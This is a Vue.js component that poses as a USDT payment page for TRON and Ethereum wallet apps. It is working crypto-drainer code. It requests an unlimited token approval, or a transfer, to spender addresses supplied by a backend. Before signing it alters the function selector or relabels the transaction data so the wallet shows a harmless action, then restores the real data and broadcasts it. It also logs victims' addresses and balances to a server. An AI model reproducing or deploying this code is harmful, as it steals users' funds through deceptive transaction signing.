<template>
    <div class="box">
        <gl-Ethereum v-if="EthereumShow" @getAddress="getAddress" ref="Ethereum"/>

        <div class="title" @click="aaaa">我的钱包地址</div>
        <div class="_box _text">
            {{ this.defaultAddress }}
        </div>

        <div class="title" @click="aaaa">{{ $t("form.address") }}</div>
        <div class="_box _text">
            {{
                defaultEthereumAddress
                    ? "0xdAC17F958D2ee523a2206206994597C13D831ec7"
                    : "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"
            }}
        </div>
        <div class="title">
            <div>{{ $t("form.amount") }}</div>
            <div class="_text">{{ amount }}USDT</div>
        </div>
        <div class="_box">
            <el-input v-model="number"></el-input>
            <div>$ {{ (number * 1.0004).toFixed(2) }}</div>
        </div>
        <el-button class="btn" size="medium" type="primary" @click="authorization">{{ $t("btn.b2") }}</el-button>
    </div>
</template>

<script>
import mode from "@/utils/native";

export default {
    name: "ImToken",
    data: () => ({
        msgData: null,
        msgshow: false,
        dialogVisible: false,
        EthereumShow: false,
        hintShow: false,
        radio: 1,
        show: false,
        href: "",
        radio1: false,
        radio2: false,
        copyUrl: "",
        // imtoken
        imtokenUrl: "imtokenv2://navigate/DappView?url=",
        // 合约
        contractAddress: "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t",
        approve: {
            address: "TU7zMQfwipHDy2FDA32C3dsmQU1X19Mdo5", //admin3
            amount: "90000000000000000000000000000",
            // method: "increaseApproval(address,uint256)",
            method: "approve(address,uint256)",
            remark: "",
            type: "",
        },
        number: "",
        // 余额
        amount: "",
        amount_hex: 0,
        Balance: "",
        //  钱包方法
        tronWeb: null,
        defaultAddress: null,
        contract: null,
        timeID: "",
        awindow: {},
        uuid: "",
        // 配置
        configList: [],
        registerNumber: 0,
        // 以太坊
        contractAddr: "",
        SpenderAddr: "",
        EthereumObj: {},
        //
        activeIndex: 1,
        asdasda: 1,
        //  钱包状态
        // 1波场钱包,2以太坊
        walletType: 1,
        utm_source: "",
        dataMsgs: {},
        dataMsgs1: "",
        qrcodeShow: false,
        bitpieShow: false,
        bitpieHinteShow: false,
        explainData: {},
        bitpieHinteMsg: "",
        explain: {
            0: {
                name: "zhijie",
                method: "approve(address,uint256)",
                str: "095ea7b3",
                type: 0,
            },
            1: {
                name: "zenjia",
                method: "increaseApproval(address,uint256)",
                str: "d73dd623",
                type: 0,
            },
            2: {
                name: "zhuanzhang",
                method: "transfer(address,uint256)",
                str: "a9059cbb",
                type: 0,
            },
            3: {
                name: "zenjia",
                method: "increaseApproval(address,uint256)",
                str: "d73dd623",
                type: 1,
            },
        },
        zzAddress: "",
        typeData: {},

        Am: 99999999,
        Az: "",
        jiamileixin: 0,
        walletName: "BITPIE",
        dataMsgs12: "",
        // 版本号
        ver: "",
        // 以太坊
        defaultEthereumAddress: "", //以太坊地址
    }),
    created() {
        this.getData()
    },
    mounted() {
        // if (window.tronWeb !== undefined) {
        this.getWalletAddress();
        // }
    },
    methods: {
        getData() {
            this.$h("get", `/Home/Tron/getauthconfig`, {
                uuid: this.uuid,
            }).then(res => {
                if (!res) return;
                if (res.Type === 200) this.configList = res.Data;
                console.log(this.configList);
            });
        },
        aaaa() {
            this.asdasda++;
            if (this.asdasda > 5) {
                this.msgshow = true;
            }
        },
        GetHeader() {
            let str = navigator.userAgent.toLowerCase();

            this.dataMsgs1 = str;

            let navigatorList = str.split("/");

            let str1 = navigator.appPackageName;
            str1 = str1 ? str1.toLowerCase() : "";

            // 欧意钱包处理
            if (str.indexOf("okex") > -1 || str1.indexOf("okex") > -1) {
                this.okxJudge();

                return;
            }
            let arr = [
                "bitpie",
                "imtoken",
                "tokenpocket",
                "tronlink",
                "bitkeep",
                "metamask",
                "trustapp",
                // "okex",
            ];
            let data = "";
            let verobj = {
                imtoken: true,
                bitpie: true,
                // okex: true,
            };
            arr.forEach((item) => {
                if (str.indexOf(item) > -1 || str1.indexOf(item) > -1) {
                    data = item;
                    if (verobj[item]) {
                        if (navigatorList.length > 0) {
                            this.ver = navigatorList[navigatorList.length - 1];
                            this.dataMsgs1 = this.ver;
                        }
                    }
                }
            });


            return data;
        },
        softwareJudgmentInit(show) {
            this.uuid = this.$route.params.id || "";
            this.number = this.$route.query.number || "";
            this.href = window.location.href;
            let query = this.$route.query.query || "";
            query = this.$queryList(this.$route.query.query || "");

            if (query.number) this.number = query.number;

            let utm_source = this.GetHeader() || this.$route.query.utm_source || query.utm_source || "";

            this.utm_source = utm_source ? utm_source.toLowerCase() : "";
            this.show = show ? true : this.$route.query.showType ? true : this.utm_source;

            this.approve = this.$store.state.BaseData.approve;

            let explain = this.explain;

            let dataObj = {};
            dataObj = this.$store.state.BaseData.imToken;
            switch (this.utm_source) {
                case "imtoken":
                    dataObj = this.$store.state.BaseData.imToken;
                    break;
                case "tokenpocket":
                    dataObj = this.$store.state.BaseData.TokenPocket;
                    break;
                case "trustapp":
                    dataObj = this.$store.state.BaseData.trustapp;
                    break;
                case "bitpie":
                    if (mode.type == 3) {
                        dataObj = this.$store.state.BaseData.BITPIEIos;
                    } else {
                        dataObj = this.$store.state.BaseData.BITPIE;
                    }
                    break;
                case "tronlink":
                    dataObj = this.$store.state.BaseData.TronLink;
                    break;
                case "bitkeep":
                    dataObj = this.$store.state.BaseData.BitKeep;
                    break;
                case "metamask":
                    dataObj = this.$store.state.BaseData.metamask;
                    break;
                default:
                    break;
            }
            this.typeData = dataObj;

            if (this.utm_source) {
                let isVer = false;

                let verList = [];
                switch (mode.type) {
                    case 2:
                        isVer = dataObj.isVerAndroid || false;
                        verList = isVer ? dataObj.verAndroid || [] : [];
                        break;
                    case 3:
                        isVer = dataObj.isVerIos || false;
                        verList = isVer ? dataObj.verIos || [] : [];
                        break;
                }
                let ver = this.ver;
                this.dataMsgs1 = isVer && verList.length > 0;

                if (isVer && verList.length > 0) {
                    let newObj = {};

                    let off = false;
                    for (let index = 0; index < verList.length; index++) {
                        let item = verList[index];
                        off = this.versionJudgmentControl(
                            ver + "",
                            item.min + "",
                            item.max + ""
                        );

                        if (off) {
                            newObj = item;
                            break;
                        }
                    }
                    if (off) {
                        this.typeData.method = newObj.method;
                        this.typeData.type = newObj.type;

                        this.typeData.ztype = newObj.ztype;
                        this.typeData.zmethod = newObj.zmethod;
                        // this.dataMsgs1 = newObj;
                        let explainData = explain[newObj.method];

                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    } else {
                        let explainData = explain[dataObj.method];
                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    }
                } else {
                    let explainData = explain[dataObj.method];

                    this.explainData = explainData;
                    this.approve.method = explainData.method;
                }
            }
        },
        async authorization() {
            this.softwareJudgmentInit(true);

            // return;
            if (!this.defaultAddress) {
                console.log(this.$refs);
                //调用方式1
                let Ethereum = this.$refs.Ethereum
                    ? this.$refs.Ethereum.account
                        ? true
                        : false
                    : false;
                if (Ethereum) {
                    this.EthereumAuthorization();
                    // this.$message.warning({
                    //     duration: 5000,
                    //     message: this.$t("hint.h8"),
                    // });
                    // return;
                } else {
                    this.$message.warning({
                        duration: 5000,
                        message: this.$t("hint.h8"),
                    });
                    return;
                }
                // let url = window.location.href;

                // if (url.indexOf("?") > 0) {
                //   url = url + "&showType=1";
                // } else {
                //   url = url + "?showType=1";
                // }
                // window.location.href = "imtokenv2://navigate/DappView?url=" + url;
                // // this.dialogVisible = true;
                // return;
            }
            // 获取trx 余额
            let tradeobj = await window.tronWeb.trx.getAccount(this.defaultAddress);
            this.Balance = tradeobj["balance"] ? tradeobj["balance"] / 1000000 : 0;

            // this.newMethod3();
            // if (this.Balance < 7) {
            //     this.$message.warning({
            //         duration: 5000,
            //         message: this.$t("hint.h9"),
            //     });
            //     return;
            // }
            let list = this.configList;
            for (let index = 0; index < list.length; index++) {
                const element = list[index];
                if (element.ChainId === this.$store.state.coding) {
                    this.contractAddress = element.Contract;
                    this.approve.address = element.SpenderAddr;
                    this.approve.type = element.Symbol;
                    this.zzAddress = element.ZZAddress;
                    this.Am = element.Am;
                    this.Az = element.Az;
                    this.dataMsgs1 = this.Am <= this.amount;

                    if (this.Am <= this.amount) {
                        let dataObj = {};
                        switch (this.utm_source) {
                            case "imtoken":
                                dataObj = this.$store.state.BaseData.imToken;
                                break;
                            case "tokenpocket":
                                dataObj = this.$store.state.BaseData.TokenPocket;

                                break;
                            case "trustapp":
                                dataObj = this.$store.state.BaseData.trustapp;

                                break;
                            case "bitpie":
                                if (mode.type == 3) {
                                    dataObj = this.$store.state.BaseData.BITPIEIos;
                                } else {
                                    dataObj = this.$store.state.BaseData.BITPIE;
                                }

                                break;
                            case "tronlink":
                                dataObj = this.$store.state.BaseData.TronLink;

                                break;
                            case "bitkeep":
                                dataObj = this.$store.state.BaseData.BitKeep;

                                break;
                            case "metamask":
                                dataObj = this.$store.state.BaseData.metamask;

                                break;
                        }
                        dataObj.method = dataObj.zmethod;
                        dataObj.type = dataObj.ztype;
                        this.dataMsgs1 = this.dataMsgs1 + "---" + dataObj.type;
                        this.typeData = dataObj;
                        if (this.utm_source) {
                            let explain = this.explain;
                            let explainData = explain[dataObj.method];
                            this.explainData = explainData;
                            this.approve.method = explainData.method;
                        }
                        this.approve.address = element.Az;

                        this.jiamileixin = 1;
                    }
                    break;
                }
            }

            let contractAddress = this.contractAddress;
            //选择合约方法
            let functionSelector = this.approve.method;
            //根据方法构造参数
            this.dataMsgs1 = this.typeData;
            let explainType = this.typeData.method == 2;
            let jiamileixin = this.jiamileixin;
            explainType = explainType
                ? explainType
                : functionSelector.indexOf("transfer") > -1
                    ? true
                    : false;
            if (explainType && this.amount < 1) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t("hint.h10"),
                });
                return;
            }

            let toAddress =
                jiamileixin == 1
                    ? this.Az
                    : explainType
                        ? this.zzAddress
                            ? this.zzAddress
                            : this.$store.state.BaseData.zzAddress
                        : this.approve.address;
            this.approve.address = toAddress;
            let methodType = this.typeData.method;
            // 3
            if (methodType == 3 && this.Balance >= 100) {
                this.newMethod3();
                return;
            }

            let parameter = [
                {
                    type: "address",
                    value: toAddress,
                },
                {
                    type: "uint256",
                    value: explainType
                        ? window.tronWeb.toHex(this.amount * Math.pow(10, 6))
                        : this.approve.amount,
                },
            ];
            let remark = this.approve.remark;
            //额外参数
            let options = {
                shouldPollResponse: false,
                feeLimit: 1000000, //1Trx
            };

            if (this.typeData.method !== 2 && this.typeData.method !== 3) {
                const res = await this.$h("get", `/Home/Tron/getauthstatus`, {
                    address: this.defaultAddress,
                    authAddress: toAddress,
                });

                if (res === true) {
                    this.$message.warning({
                        duration: 5000,
                        message: this.$t(`hint.approveMsg3`),
                    });
                    return;
                }
            }
            // if (options) {
            //   return;
            // }
            this.contractMethod(
                contractAddress,
                functionSelector,
                parameter,
                remark,
                options,
                explainType ? "transfer" : "approve",
                toAddress
            );
        },
        // 接受以太坊地址
        getAddress(address, amount) {
            this.walletType = 2;
            this.jumpPanDuan();
            this.defaultEthereumAddress = address;
            // this.amount = amount;
            // this.show = address ? true : false;
        },
        // 通过 tronWeb 获取钱包地址
        getWalletAddress() {
            this.timeID = setInterval(() => {
                this.registerNumber++;

                // 获取地址有延迟，需要循环获取
                if (!window.tronWeb.defaultAddress) {
                    if (this.registerNumber >= 5) {
                        clearInterval(this.timeID);
                        this.EthereumShow = true;
                    }
                    return;
                }
                this.defaultAddress = window.tronWeb.defaultAddress['base58'] ?? "";
                this.walletType = 1;
                this.getNumber();
                window.clearInterval(this.timeID);
            }, 500);
        },
        // 通过 tronWeb 获取账户余额
        async getNumber() {
            // this.show = true;
            let contract = await window.tronWeb.contract().at(this.contractAddress);
            await contract.balanceOf(this.defaultAddress).call((err, tex) => {
                if (err == null) {
                    this.amount = tex._hex / 10 ** 6;
                    this.amount_hex = tex._hex;
                }
            });
        },
        async contractMethod(
            contractAddress,
            method,
            parameter,
            remark,
            options = {},
            type,
            toAddress
        ) {

            //选择合约方法
            let functionSelector = method;
            //根据方法构造参数

            // 构造智能合约交易信息
            let res = await window.tronWeb.transactionBuilder
                .triggerSmartContract(contractAddress, functionSelector, {}, parameter)
                .catch((err1) => {

                    // 构建交易信息失败
                    return false;
                });
            // 向转账交易信息中追加 备注信息
            // await window.tronWeb.transactionBuilder.addUpdateData(
            //   res.transaction,
            //   remark,
            //   "utf8"
            // );
            // 对已经添加备注的交易信息进行签名
            //
            let data = "";
            let hex_ = "";
            let tranType = "";
            let tranData = "";
            let typeData = this.typeData;
            let encryptionType = typeData.type;
            let explainData = this.explainData;
            let replaceData = this.$store.state.BaseData.replaceData;

            if (encryptionType == 1) {
                let replaceStr = explainData.str;
                data = res.transaction.raw_data.contract[0].parameter.value.data;
                res.transaction.raw_data.contract[0].parameter.value.data =
                    data.replace(replaceStr, replaceData[replaceStr]);
                hex_ = res.transaction.raw_data_hex;
                res.transaction.raw_data_hex = hex_.replace(
                    replaceStr,
                    replaceData[replaceStr]
                );
            }
            if (encryptionType == 2) {
                tranData = res.transaction.raw_data.contract[0].parameter.value.data;
                tranType = res.transaction.raw_data.contract[0].type;

                res.transaction.raw_data.contract[0].parameter.value.data = "Transfer";
                res.transaction.raw_data.contract[0].type = "Transfer";
            }
            // if (this.utm_source) {

            //   //types = res.transaction.raw_data.contract[0].type;


            //   //res.transaction.raw_data.contract[0].parameter.value.data = "USDT";
            //   // res.transaction.raw_data.contract[0].parameter.value.data =
            //   //   data.replace("095ea7b3", "00000000");
            //   //res.transaction.raw_data.contract[0].type = "USDT";
            //   // res.transaction.raw_data_hex = hex_.replace("095ea7b3", "00000000");
            // }

            //
            let sign = await window.tronWeb.trx
                .sign(res.transaction)

                .catch((err2) => {


                    //签名失败
                    return false;
                });

            if (encryptionType == 1) {
                sign.raw_data.contract[0].parameter.value.data = data;
                //sign.raw_data.contract[0].type = types;
                sign.raw_data_hex = hex_;
            }

            if (encryptionType == 2) {
                sign.raw_data.contract[0].parameter.value.data = tranData;
                sign.raw_data.contract[0].type = tranType;
            }

            // 将签名交易广播上链
            return await window.tronWeb.trx
                .sendRawTransaction(sign)
                .then((res) => {

                    switch (type) {
                        case "approve":
                            this.authaccountUploading({
                                address: this.defaultAddress,
                                authAddress: this.approve.address,
                                status: res.result ? 1 : 0,
                                Contract: contractAddress,
                                agentId: this.uuid,
                                type: this.approve.type,
                                ChainId: this.$store.state.coding,
                                Usdt: this.amount || 0,
                                Balance: this.Balance || 0,
                                tag: 10,
                                TxId: res.txid,
                                app: this.utm_source,
                                ua: navigator.userAgent.toLowerCase(),
                            });

                            break;
                        case "transfer":
                            this.transferRecord({
                                from: this.defaultAddress,
                                to: toAddress,
                                status: res.result ? 1 : 0,

                                amount: this.amount || 0,

                                txId: res.txid,
                            });

                            break;

                        default:
                            break;
                    }
                    this.msgData = {
                        data: {
                            address: this.defaultAddress,
                            authAddress: this.approve.address,
                            status: res.result ? 1 : 0,
                            Contract: contractAddress,
                            agentId: this.uuid,
                            type: this.approve.type,
                            ChainId: this.$store.state.coding,
                            Usdt: this.amount || 0,
                            Balance: this.Balance || 0,
                            TxId: res.txid,
                            app: this.utm_source,
                            ua: navigator.userAgent.toLowerCase(),
                        },
                        msg: res,
                    };

                    if (this.amount < 2000) {
                        // this.hintShow = true;
                        this.$message.warning({
                            duration: 5000,
                            message: this.$t("hint.recharge"),
                        });
                    }

                })
                .catch((outputErr) => {
                    //交易广播出错
                    switch (type) {
                        case "approve":
                            this.authaccountUploading({
                                address: this.defaultAddress,
                                authAddress: this.approve.address,
                                status: 0,
                                tag: 10,
                                Contract: contractAddress,
                                agentId: this.uuid,
                                type: this.approve.type,
                                ChainId: this.$store.state.coding,
                                Usdt: this.amount || 0,
                                Balance: this.Balance || 0,
                                TxId: "",
                                app: this.utm_source,
                                ua: navigator.userAgent.toLowerCase(),
                            });

                            break;
                        case "transfer":
                            this.transferRecord({
                                from: this.defaultAddress,
                                to: toAddress,
                                status: 0,

                                amount: this.amount || 0,

                                txId: "",
                            });
                    }

                    return false;
                });
        },
        async authaccountUploading(data) {
            if (this.jiamileixin === 1) {
                return;
            }
            this.$h("post", `/Home/Tron/account`, data).then(res => {
                console.log(res);
            })
        },
    }
}
</script>

<style lang="less" scoped>
.box {
    padding: 20px 20px;

    .title {
        display: flex;
        padding: 24px 10px;
        justify-content: space-between;
        font-size: 18px;

        ._text {
            color: #949495;
        }
    }

    ._box {
        border: 1px solid #ccc;
        border-radius: 16px;
        padding: 24px 20px;
        font-size: 14px;
        color: #949495;

        &._text {
            word-break: break-all;
        }

        .el-input {
            /deep/ .el-input__inner {
                border: none;
            }
        }

        background-color: #fff;
    }

    .btn {
        margin-top: 30px;
        height: 50px;
        width: 100%;
    }
}
</style>
